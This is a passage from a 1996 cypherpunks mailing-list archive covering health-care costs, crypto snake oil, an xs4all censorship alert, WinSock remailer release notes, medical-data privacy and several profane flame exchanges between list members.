>Canada has the world's second most expensive system (after ours) and I
> think is a bit closer to 80% of our per cap expenditures. [...]
>Canadian costs have risen at approx the same rate as ours.  
 
Thanks for the figures and historical background. I'll keep trying to verify the
figures I cited, but I see no reason to disagree with you.
 
> Interestingly, even though government expenditures here are 60% of the
> total, per cap government expenditures on health care are higher here
> than in the UK under the Nattie Health.  
 
This is a surprise. I guess it would also be an example.
 
>Course Canada lost it when smuggling defeated the high tax levels on
>cigarettes.  This will be more of a problem in the future as more efficient
>markets enable more smuggling.
 
At present, provinces west of Ontario have not dropped taxes, while Ontario,
Quebec and New Brunswick dropped them significantly (+50%). The drop had a
predictably negative effect on the smuggling, although due to the rapid increase
in smoking rates among adolescents pressure is mounting to increase the taxes
again.
 
Most systems have undesired side-effects (e.g. remailers and spam). But if you
can keep second order effects from becoming first order, you're heading in the
desired direction. 
 
Ciao,
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 19 Sep 1996 11:01:16 +0800
To: Jeff Davis <eagle@armory.com>
Subject: Re: All Bets Off
In-Reply-To: <9609171918.aa03723@deepthought.armory.com>
Message-ID: <Pine.BSF.3.91.960918182835.20649A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 17 Sep 1996, Jeff Davis wrote:

> > Just so this isn't hanging in cyberspace forever, my $5,000 bet for 
> > anyone to prove the TWA 800 flight was downed by a U.S. missile is now 
> > *off the table*.  
> 
> I heard through  the family grapevine that they have pictures of a Stinger
> taking out the plane they're analyzing in the Pentagon.  There are 220+
> Stingers *missing* in the US, so its not like they have to smuggle them
> in...  (That's not proof by any means, but *my* family grapevine has always
> been very reliable.  The cousin who told me this has a Dad who flew as
> the intelligence officer observer on Bronco flights out of Quang Tri for
> 18 months, rotating out just before the base was over run in May of '72.) 

Does this cousin also have an aunt who lived next door to Joe Montana's 
babysitter? I might know his father ...

Ask your family grapevine about the stinger's op altitude, and the 
altitute of the TWA when it broke up - I don't have Jane's lying around, 
but it seems that the TWA plane was a tad bit high for a stinger.

- r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Sutherland <seans@pobox.com>
Date: Thu, 19 Sep 1996 11:18:12 +0800
To: cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
Message-ID: <19960918235435406.AAB287@maverick>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: wendigo@pobox.com, cypherpunks@toad.com
Date: Wed Sep 18 18:54:08 1996
> I think a blacklist of that sort is inherently bad.  I would much rather
> have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than
> just be spoon fed a list of good products vs. bad products.  Pardon the
> cliche, but if you give a man a fish ... etc, etc.

Not only that, but you're also looking at a potential lawsuit, unless such 
a list were compiled and managed through the use of a nymserver.  Since 
there's no way, within reasonable limits, that a cryptogrpahic program can 
be proven bad, then a lawsuit is inevitable.  I could potentially see a 
list of products which have "methods which have been proven ineffective in 
securing data against determined attacks" such as DES, etc., but otherwise, 
it's just begging for trouble.
- ---
Sean Sutherland         | GCS/C d- s+:+ a--- C+++ V--- P L E- W++ N++ K- w 
PGP Key ID: E43E6489    | o O-(++) M--  V PS+ PE++ Y++  PGP++(+) t--- 5+++ 
http://pobox.com/~seans | X++ Rb++ DI+ D+ G e- h! !r y

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMkCLo1ZoKRrkPmSJAQE9swf/VWCd3++mf2NUPPPd37bW0oHTcz/T2Ft/
PAN/3bf0/NgE/0XxOHZn3DY2a8J5BYUNtnmoqwc/fVo+UQ1sLL8OgYZb/5PMLKtC
A4u9IzhNcdg03M5r2n8DltDIsYewiA7NS3IP3/7s9PU/qpsXxS5aa9rSryoB5sLe
qPRW97uutrhQD6BREcvVxpmYllYLLXGX9uYxevK99dxpUrNfjKWm/XL3iE2RsF5n
6mERNQXu3yUEEfPpAvIUPXmw9raAhlseBVBY+S4CbhqKRmH8pn6X2ZKeWouo4cPn
ZWyyW6CrQJXbX8ARCp8ojI66UgkHCQpNWKIWKwAvTvtoPAT0lSvd+A==
=zuPa
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 19 Sep 1996 12:46:19 +0800
To: cypherpunks@toad.com
Subject: Interesting article in Upside ...
Message-ID: <199609190203.TAA22357@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Article on the political side of crypto with respect to this year's
election:

    http://www.upside.com/print/oct96/election.html

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Le Heux <alexlh@yourchoice.nl>
Date: Thu, 19 Sep 1996 07:08:47 +0800
To: cypherpunks@toad.com
Subject: (fwd) Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITE
Message-ID: <199609181746.TAA13590@sarah>
MIME-Version: 1.0
Content-Type: text


Path: xs4all!felipe
From: felipe@xs4all.nl ()
Newsgroups: xs4all.announce
Subject: Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITE
Date: 18 Sep 1996 17:28:31 GMT
Organization: XS4ALL, networking for the masses
Lines: 118
Approved: the boss
Message-ID: <51pbfv$anu@news.xs4all.nl>
NNTP-Posting-Host: xs1.xs4all.nl
X-XS4ALL-Date: Wed, 18 Sep 1996 19:28:31 MET DST
X-Newsreader: NN version 6.5.0 #4



                      *** GLOBAL ALERT ***

FOR IMMEDIATE RELEASE                       SEPT. 18, 1996

-  Please redistribute this document widely
   with this banner intact
-  Redistribute only in appropriate places
   & only until 15 October 1996

        GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES.
  
        At the behest of, and in response to legal threats from,
the German government, internet providers in Germany have blocked
the Dutch Web site Access For All (www.xs4all.nl), removing German
users' access to the entire xs4all system. The German government
demanded this action because xs4all hosts a Web "home page" with
so-called left-wing political content that, though fully legal in
the Netherlands, is allegedly illegal in Germany. (see:
http://www.anwalt.de/ictf/p960901e.htm). As a result of this action,
*all* xs4all web sites, including several thousand that have nothing
to do with the offending home page, are unavailable to readers in
Germany.
      	Please send a letter of protest to the German ambassador in
your country, ask your foreign minister to protest officially to the
German government, and distribute this alert as widely as possible
online and to the press.

        Referring to article 19(2) of the International Covenant on
Civil and Political rights, which Germany ratified in 1973, we, the
undersigned organizations, consider this censorship an illegal act.
Additionally, the value of attempting to ban content the German
government finds offensive is highly questionable. The proper response
to offensive expression is more and better expression, and prosecution
of offending criminals, not censorship.

        As a result of the overly broad censorship measure which
targets an entire Internet access provider instead of a specific
user, all 3000 and more Web site hosted by xs4all are virtually
inaccessible in Germany. The loss of clients who market in Germany
has resulted in economic damage to xs4all. The immeasurable harm of
censoring thousands of other users for the speech of one is even
greater.
        Access for All, though it has expressed willingness to assist
the Dutch police in identifying online criminals abusing the xs4all
system, has a policy against censoring its clients.
        Mirroring this position, at least one German Net provider has
responded to the government demands with skepticism, pointing out that
their compliance with the censorship request may cause them to violate
contracts with their own German users, and that the government's
liability threats are tantamount to holding a phone company liable for what
users say on the telephone.

        Instead of the futile act of censorship that has simply
drawn increased attention to the offending material and resulted
in its widespread availability on other sites throughout the
world, the German government should have acted through legal
channels and asked the authorities in the Netherlands to cooperate
in determining what legal action, if any, was appropriate.

        We are concerned that German internet providers have
cooperated so easily with government censorship efforts. Some
level of cooperation was probably assured by underhanded and
rather questionable police threats of system operator liability
for user content, but we must urge more resistance on that part
of Net access providers to such online censorship schemes. As
with libraries, there are many who would censor, but there is a
responsibility on the part of providers of access to information,
to work to protect that access, else libraries, and Internet service
providers, lose the reason for their existence.

        We ask that the German government refrain from further
restrictive measures and intimidation of internet providers and
recognize the free, democratic, world wide communications
represented by the Internet.
	All governments should recognize that the Internet is not
a local, or even national, medium, but a global medium in which
regional laws have little useful effect. "Top-down" censorship
efforts not only fail to prevent the distribution of material to
users in the local jurisdiction (material attacked in this manner
can simply be relocated to any other country), but constitutes a
direct assault on the rights and other interests of Internet users
and service providers in other jurisdictions, not subject to the
censorship law in question.

        For press contacts, and for more information about the
Internet, see the homepages for the signatories to this message:

DB-NL (Digital Citizens Foundation in the Netherlands)
        * http://www.xs4all.nl/~db.nl
ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei
CITADEL-E F France *http://www.imaginet.fr/~mose/citadel
CommUnity (UK) * http://www.community.org.uk
Electronic Frontier Canada * http://www.efc.ca/
Electronic Frontier Foundation (USA) * http://www.eff.org
Electronic Frontiers Australia * http://www.efa.org.au/

Other signatures:
NLIP, Dutch Foundation for Internet Providers * http://www.nlip.nl
Internet Providers Rotterdam * http://www.ipr.nl
Digitaal Werknet Nederland * http://www.dwn.nl
Foebud e.V, foundation to promote free datatraffic,
                * http://www.zerberus.de
National Writers Union (UAW LOCAL 1981 AFL-CIO)
                * http://www.nwu.org/nwu/
Nizkor Project * http://www.nizkor.org/
Internet Access Foundation (NL) * http://www.iaf.nl/
Digitale Stad Venlo * http://www.dsvenlo.nl
CSO * http://www.canucksoup.net/



--
 Felipe Rodriquez          -  XS4ALL Internet  - finger felipe@xs4all.nl for 
 http://xs4all.nl/~felipe/ - Managing Director - pub pgp-key 1024/A07C02F9 

  pgp Key fingerprint = 32 36 C3 D9 02 42 79 C6 D1 9F 63 EB A7 30 8B 1A

--
/// I dabble in techno-house and sometimes,
/// I do that badass hip-hop thang...
/// But the F U N K gets me every time!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Thu, 19 Sep 1996 11:01:48 +0800
To: remailer-operators@c2.org
Subject: WinSock Remailer Version ALPHA 1.3 Now Available
Message-ID: <199609182346.TAA136362@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Y'all:

Version ALPHA 1.3 of the WinSock Remailer is now available at Lance 
Cottrell's Export Controlled Crypto Site at:

  http://www.obscura.com/crypto.html

After you get past the crypto control and into ftp site, look in the
DOS directory for the file WSA13.ZIP.

You can find more information on my webpage at:

  http://www.c2.net/~winsock/

which I will be updating tonight.

What's new in this release:
- --------------------------

1)  Support for e-mail accounts that are "Shared" or "Exclusive".  This
    function allows a remailer operator to share a personal e-mail account 
    with the remailer.  The way this function works is that messages 
    without valid remailer headers are NOT deleted from the mail spool
    file (the file where your messages are stored at your Internet Service
    Provider).  Instead, the remailer only deletes messages with valid
    remailer headers from the mail spool, allowing another e-mail client
    (such as Eudora or Pegasus Mail) to retrieve the non-remailer 
    messages.

    If the e-mail account is "Exclusive", the remailer will download all
    messages from the mail spool file and delete them automatically.

    Note that if you use the "Shared" function, you should always operate
    the remailer FIRST, and then your e-mail client.  This way, the 
    remailer removes the remailer messages, leaving the personal messages
    (and improperly formatted remailer messages) for your e-mail client
    to process.  You will have to halt the remailer while using your
    e-mail client.

    If, for some reason, you manage to download a message meant for the
    remailer, simply save it to a file (in ASCII format) with a filename
    of the form INxxxxxx.yyy, where:

      xxxxxxx is a six-digit number (doesn't matter what number)
      yyy is a three-digit number (doesn't matter what number)

    and save it to the INMAIL directory.  Make sure there is no other 
    message with that filename so that you won't overwrite an existing
    message.  The remailer will process the message normally on the next 
    batch.

    You will probably want to kill all rejected messages, as each batch
    of messages that are processed will download each non-remailer 
    message every time.  Set the remailer to KEEP rejected messages until
    you feel comfortable with the remailer's operation, so you can
    recover any personal messages in the REJECT directory, if there is
    a problem with the remailer.

2)  Support for message pool size on the Outgoing Mail dialog box.  I
    recommend that the pool size be set to 3 for lightly used remailers
    (less than 100 messages per day) and 5 to 10 for heavily used remailers.

3)  PGP only operation now works properly.

4)  Separate secret key ring file for the remailer's key now works 
    properly.  The key file must be located in the PGP directory and
    only the filename should be used in the edit box on the PGP Options
    dialog box (the path is automatically appended to the filename).

5)  The rare problem of the remailer locking up while retrieving messages
    from the POP server has been fixed.

6)  Messages with subject help are now accepted along with remailer-help,
    to send the remailer help file.

Features not yet implemented and known problems:
- -----------------------------------------------

1)  Latent-Time is not operational; the header is ignored.

2)  Message size limit is not implemented.

3)  Help file is not implemented.  Use my webpage at:
    http://www.c2.net/~winsock/setup.html instead.

4)  Hard coded IP addresses are not supported.

5)  Message reordering for NNTP is not supported yet.

6)  The remailer does not work under WinNT or Win95 yet.

7)  The remailer does not operate with the Netcom winsock.

8)  If the remailer does not have enough memory to run the PGP task in a 
    DOS window, the PGP decryption will fail and the message will
    be lost.  Test a few messages before allowing the remailer to run 
    unattended.

9)  Occasionally, the remailer timing out on SMTP or POP3 will cause 
    Free Agent (the newsreader) to disconnect from the news server when 
    using the Internet-In-A-Box WINSOCK.  Netscape and Private Idaho also 
    cause this problem, so I am unsure if this is a problem with the 
    remailer or with the WINSOCK.

10) Getting the addresses in the From: and Request-Remailing-To: header 
    lines is weak (requires only that an "@" be present for the address 
    to be assumed valid.  Addresses without an "@" sign will be rejected.

11) Loading the WINSOCK.DLL and dialing does not work with Internet-In-A-Box
    dialer.  Trumpet may work, but has not been tested recently.  I will 
    retest with Trumpet in a few days.  The remailer has not been tested 
    with any other WinSocks.  If you find any that work or don't work, 
    please let me know.

12) Debugging messages in DEBUG.ASC file in the LOG subdirectory are 
    cryptic.  Generally, timeouts are caused by the server not responding 
    within 60 seconds.

13) Daylight savings time in the Date: header is not yet supported (it will
    always use standard time).

14) On rare occasions, long messages are sometimes munged.  I've been 
    working on this one for weeks, and still don't know why.

Installing the WinSock Remailer:
- -------------------------------

1)  Create a directory where you want the remailer code to reside,
    for example, C:\REMAILER.  You should have at least 10-20 MB of 
    free disk space on the drive where the remailer will operate.

2)  Unzip the file WSA13.ZIP into the directory you just created.
    You will find three files, WSRMA12.ZIP, this file README.TXT and 
    WSRAM13.SIG.  WSRMA13.SIG is the detached signature file for WSRMA13.ZIP.  
    Verify the signature using PGP and my key found on my homepage at 
    http://www.c2.net/~winsock.

3)  You will find the following files in WSRMA13.ZIP:

 Length  Method   Size  Ratio   Date    Time    CRC-32  Attr  Name
 ------  ------   ----- -----   ----    ----   -------- ----  ----
 219648  Implode 107495  52%  11-17-94  04:50  d2386b5d --w-  BC450RTL.DLL
 164928  Implode  50249  70%  02-28-95  11:14  060f476f --w-  BWCC.DLL
    283  Shrunk     220  23%  08-04-96  17:41  eff2eab1 --w-  COMMENT.ASC
     34  Stored      34   0%  08-04-96  17:44  5400f517 --w-  DEST.BLK
   1310  Implode    731  45%  09-16-96  23:49  7049ba29 --w-  HELP.ASC
    232  Shrunk     194  17%  08-04-96  17:43  84f570bc --w-  KEY.ASC
   4846  Implode   2609  47%  08-13-96  21:37  f8aacb35 --w-  LICENSE.TXT
 266538  Implode  98828  63%  09-16-96  23:42  80b5a398 --w-  REMAILER.EXE
     17  Stored      17   0%  08-04-96  17:44  28dedbf6 --w-  SOURCE.BLK
    545  Implode    179  68%  08-27-95  10:59  d85b6f8e --w-  WRPGP.PIF
 ------          ------  ---                                  -------
 658381          260556  61%                                       10

4)  Move the files BWCC.DLL and BC450RTL.DLL into your Windows system
    directory (usually C:\WINDOWS\SYSTEM) only if:
    a) you don't already have these two files, OR
    b) the dates on the two files in your system directory have dates
       earlier than those shown above.
    If you already have the same or later dated files, delete these two
    files.

5)  Move the file WRPGP.PIF into your PGP directory (you should have
    installed PGP before installing the remailer), usually C:\PGP.
    Make sure the environment variable PGPPATH points to your PGP 
    directory.

6)  Edit the file COMMENT.ASC to customize the headers of messages sent
    by your remailer.  You will want to include information on where to 
    send complaints and blocking requests, and a pointer to your remailer's
    home page, if any.

7)  Edit HELP.ASC for specific help information on how to use your remailer.
    This file will be sent to users of your remailer if you enable 
    remailer-help on the Options Dialog Box.  You should include information
    on which options you are using with your remailer.

8)  Edit KEY.ASC to insert your remailer's PGP public key.

9)  Edit SOURCE.BLK (source address blocking file) and DEST.BLK (destination
    address blocking file) for any addresses you want to block.  I 
    recommend you block "whitehouse.gov" to make sure no one uses your
    remailer to threaten the President, which is a federal crime.  Each
    address must go on a separate line.

10) Create a "Program Item" that you will use to startup the remailer from 
    the Windows Program Manager.  Do this by selecting the Group that you
    want to put the WinSock Remailer into and then selecting File | New
    from the Program Manager.  Make sure that the Working Directory points
    to the directory where REMAILER.EXE resides.

11) Once you have done all of the above instructions, you can now run the
    remailer for the first time.  Open all of the dialog boxes under the
    Setup Menu and fill out all of the items.  See the WinSock Remailer
    Setup Page at http://www.c2.net/~winsock/setup.html for more details.

12) Once everything is setup properly, you can now run the remailer.
    Use Private Idaho to send the remailer some test messages and verify
    that the operation of the remailer is successful.  You will probably 
    want to turn on logging so that you can debug any problems with your
    remailer setup.

If you have any problems or questions, send me a note at jgrasty@gate.net
and I will get back to you as soon as I can.  You can find additional 
information on my webpage at http://www.c2.net/~winsock/.  See also the
release notes at http://www.c2.net/~winsock/relnote.html.

Since this is alpha software, you may encounter some problems.  Specifically,
I need to know if you have success with any of the following untested 
configurations:

a) Windows 95 (now known not to work)
b) Windows NT (now known not to work)
c) Any WinSock other than Internet-In-A-Box or Trumpet WinSock.
d) Any version of PGP other than 2.6.2.

If you do find a problem, give me detailed information on your computer's
configuration, such as version of Windows, Winsock, amount of memory, 
which version of PGP, etc.

Good luck,

Joey Grasty
jgrasty@gate.net



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMkCJNsODO2V89BZZAQGpSgL/bfB+K6kZsguHIWlmOdzkQiU/sJHYYFZN
XMwyvt+CXyuQX3nCIwHEkWglFIly+9+FUHfD49McTuBAx0E/EyfuiQbS4XkiSsym
6r/B4kBv3w9Tv54p19LnsApSH4YjGHMX
=4XOe
-----END PGP SIGNATURE-----

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 11:50:17 +0800
To: cypherpunks@toad.com
Subject: [NEWS]
Message-ID: <XJ8guD106w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


American Banker, 9/17/96

CHASE TO OFFER DEALERSHIPS AUTO LOAN DECISIONS OVER INTERNET

Chase Manhattan Corp.'s auto financing division has begun using the
Internet to provide dealerships with loan-approval decisions. The bank
is the first of eight financial institutions that have committed to
using the system, developed by IBM Corp. By computerizing loan
applications and sending data electronically, Chase officials said the
bank can grant approvals in as few as two minutes. Up to 50% of the
division's auto loans will be running through the system within the
next 18 months. Chase, the largest car lender not affiliated with a car
company, is connected to six dealerships currently using the system and
will establish connections to 100 dealers with the official introduction
in October. Other financial institutions planning to use the on-line
system include NationsBank Corp., G.E. Capital Auto Financial Services
Inc., Regions Financial Corp., and Citibank Puerto Rico. The dealer's
computer is connected to the Internet through the IBM Globa l Network,
which is also used to retrieve an encrypted report from a credit bureau.
The dealer's pre-established "key" decodes the report and causes the
screen to display one, two, or three stars -- representing poor, fair,
or good credit. This gives the dealer an idea of which financial
institutions are most likely to approve the loan.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 19 Sep 1996 17:17:44 +0800
To: cypherpunks@toad.com
Subject: Re: A Bizarre Increase in the Ad Hominems Here
In-Reply-To: <TZ0FuD105w165w@bwalk.dm.com>
Message-ID: <3240C258.3464@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> tcmay@got.net (Timmy May) (fart) writes:
> * Detweiler (vznuri@netcom.com) writes:
> Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy
> believes his own lies.

> .....random slurs deleted.....

> Recently, 3 people in the computer security field have independently
> told me that Timmy May approached them "off-list" to complain about
> things I supposedly say on the Internet - most of which I never said.
> When I asked about it on this mailing list, Timmy posted what was
> shown to be a lie (about his complaint to Kelly Goen.) Timmy is known 
> as a nutcase and a liar - if he keeps up his "character assassination"
> attacks, the only reputation he hurts is his own.

Pardon me for butting in, but "nutcase and liar" are some pretty 
significant slurs, moreso than "putz" or "bozo" or whatever. I'd say 
there's gotta be a helluva story here. Background, anyone?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 19 Sep 1996 14:02:02 +0800
To: """"" <perry@piermont.com>
Subject: Re: XPA_nix
Message-ID: <19960919034825859.AAA177@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996 12:22:10 -0400, Perry E. Metzger wrote:

>> > Cheswick opines,"This is the first major attack of a kind that I believe to
>> > be the final Internet security problem." 
>> Harrumph.  We should only BE so lucky.

>I don't remember if Ches was quoted correctly, but its more or less
>true -- we know how to deal with most classes of major problems, but
>denial of service is still a major question mark. I suspect its the
>last big frontier.

Hopefully it will die out if things ever switch over to a digicash payment
scheme.   Then only the big guys would mess with it...

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 19 Sep 1996 12:32:06 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: GAK, GAP, GAY
In-Reply-To: <ae657f56110210042afc@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.960918203816.20649I-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> On a related note, I read an article yesterday about the proposed new
> Health Data Base, with all encounters with any medical institution or any
> health care provider of any sort being cross-linked and cross-referenced.
> The privacy concerns are supposedly handled by having "security tickets"
> for various hospital officials, researchers (!!), insurance companies, and
> law enforcement. (I put the "!!" next to the "researchers" because I don't
> recall releasing my medical and dietary history to any so-called
> "researchers." While I have no doubt that many "data miners" would like
> access to such national data bases, and that some potentially valuable
> information could be gleaned, I didn't release this information for Joe
> Gradstudent, Ph.D. candidate to sift through.)

Don't get me wrong - I'm not disagreeing with you about how grim your
points are. I just wanted to point out that information "could" be
released to researchers without identifying the patient - researchers are
generally interested in statistical data, such as the incidence of cancer
per zip code, etc., which doesn't require your name to be released. Zip
codes are sufficiently populated that this probably is of no danger to
privacy. 

OTOH, the potential for mis-use of such records is high, and allowing 
access to a huge number of commercial sites, and their employees, 
certainly opens a lot of holes.

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 19 Sep 1996 16:22:38 +0800
To: Daniel Christopher Miskell <DMiskell@envirolink.org>
Subject: Re: A daily warning regarding Timothy C. May
In-Reply-To: <v01540b00ae65a6cd6c10@[150.160.45.151]>
Message-ID: <3240C486.15E0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Daniel Christopher Miskell wrote:
> Timothy C. May is a lying sack of shit.
> Right.  And you had to insult him through use of anonymous mail.  Boy, 
> you're real brave, shedding the light to the rest of the cypherworld
> in such a manner.
> Apologies for the spam, but there was no address, obviously.
> If in fact we are the only intelligent life on this planet, why the
> fuck are we in this goddamn mess?

A. There's probably no intelligent life in the (this) universe, and the
   Uncertainty Principle is probably wrong, too (i.e., there is really
   no Free Will, so there are no valid answers either), -and-

B. If you were truly intelligent, would you want to come here?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 12:46:53 +0800
To: cypherpunks@toad.com
Subject: Re: Fuckhead
In-Reply-To: <199609181408.AA21359@crl11.crl.com>
Message-ID: <yT0guD107w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From varange@crl.com  Wed Sep 18 10:09:35 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 18 Sep 96 11:07:01 EDT
	for dlv
Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA17484 for dlv@bwalk.dm.com; Wed, 18 Sep 96 10:09:35 -0400
Received: from crl11.crl.com by mail.crl.com with SMTP id AA03230
  (5.65c/IDA-1.5 for <dlv@bwalk.dm.com>); Wed, 18 Sep 1996 07:10:02 -0700
Received: by crl11.crl.com id AA21359
  (5.65c/IDA-1.5 for dlv@bwalk.dm.com); Wed, 18 Sep 1996 07:08:08 -0700
From: Troy Varange <varange@crl.com>
Message-Id: <199609181408.AA21359@crl11.crl.com>
Subject: Fuckhead
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 07:08:08 -0700 (PDT)
Priority: Fuckhead
Precedence: Fuckhead
Reply-To: dlv@bwalk.dm.com
In-Reply-To: <Fuckhead>
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 10        

Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 12:43:40 +0800
To: cypherpunks@toad.com
Subject: Re: [joke, non-code] Re: Get this for a snake-oil example :)
In-Reply-To: <Pine.OSF.3.91.960918100655.20016A-100000@alcor.concordia.ca>
Message-ID: <yu0guD108w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


f_estema@alcor.concordia.ca writes:
> Shamster: SHA-enabled biocomputing hamster.

I'm sure Timmy would like to wrap one up in duct tape and shove it
up his ass...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 13:05:14 +0800
To: cypherpunks@toad.com
Subject: Re: A daily warning regarding Timothy C. May
In-Reply-To: <Pine.SUN.3.91.960918074708.10102B-100000@crl14.crl.com>
Message-ID: <ey0guD109w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
> C'punks,
>
> On Wed, 18 Sep 1996, Anonymous wrote:
>
> > Timothy C. May is a lying sack of shit.
>
> I've never known Tim to lie.

I agree with Anon - Timmy (fart) is a lying sack of shit. I caught him
"complaining" to various people in the computer security industry
about what I write on the 'net - and he attributes shit to me that
I knows I never wrote. That's lie #1.

When confronted with evidence, Timmy further lied about his communication
with one of these people. He's a sad piece of work.

> Back under your rock, anonymous.

Yes - please, don't send a *daily* Timmy shit to this mailing list. This used
to be a good forum to discuss crypto. Timmy doesn't know much about crypto,
so he's been spamming it with his libertarian crap. Please don't contribute
more shit than we already get from Timmy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 19 Sep 1996 17:25:13 +0800
To: Chip Mefford <cmefford@avwashington.com>
Subject: Re: cypherpunk listserve usefulness
In-Reply-To: <v03007801ae65b79e711a@[207.79.65.35]>
Message-ID: <3240C832.E1E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Chip Mefford wrote:
> As much as it shames me, I have recently discovered that by filtering
> messages from only 2 participants and setting body filters on 3
> keywords have remarkably improved the usefulness of this listserve.
> As much as I do enjoy some of the filtered subject matter, I really
> feel it is very off subject and makes this listserver useless for the 
> intended task.
> I guess that makes me a censor and it has me reexamining some things.

Why not have the filter be more like a sieve, and dump the low-priority 
stuff into separate containers, then sort them by personal criteria such 
as message size, frequency of key words, etc.?  If you maintain multiple 
sorts, you can look over the stuff when you have a chance, and mass-dump 
a series of messages that don't make a cutoff you specify at read-time.

Since I write my own utilities, I can mix and match keyword parsers, 
multiple-indexed text browsing, and so on. Of course, the commercially-
available software totally sucks...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Sep 1996 14:37:32 +0800
To: cypherpunks@toad.com
Subject: Re: GAK, GAP, GAY
Message-ID: <ae6618a71402100430c1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 AM 9/19/96, Rabid Wombat wrote:

>Don't get me wrong - I'm not disagreeing with you about how grim your
>points are. I just wanted to point out that information "could" be
>released to researchers without identifying the patient - researchers are
>generally interested in statistical data, such as the incidence of cancer
>per zip code, etc., which doesn't require your name to be released. Zip
>codes are sufficiently populated that this probably is of no danger to
>privacy.

Fine, if they can convince me that of this, I may consent to letting them
in on my secrets. I surmise that asking permission of patients is not part
of the plan, though.

Secondly--and this is actually a crypto-related point (!)--it does not take
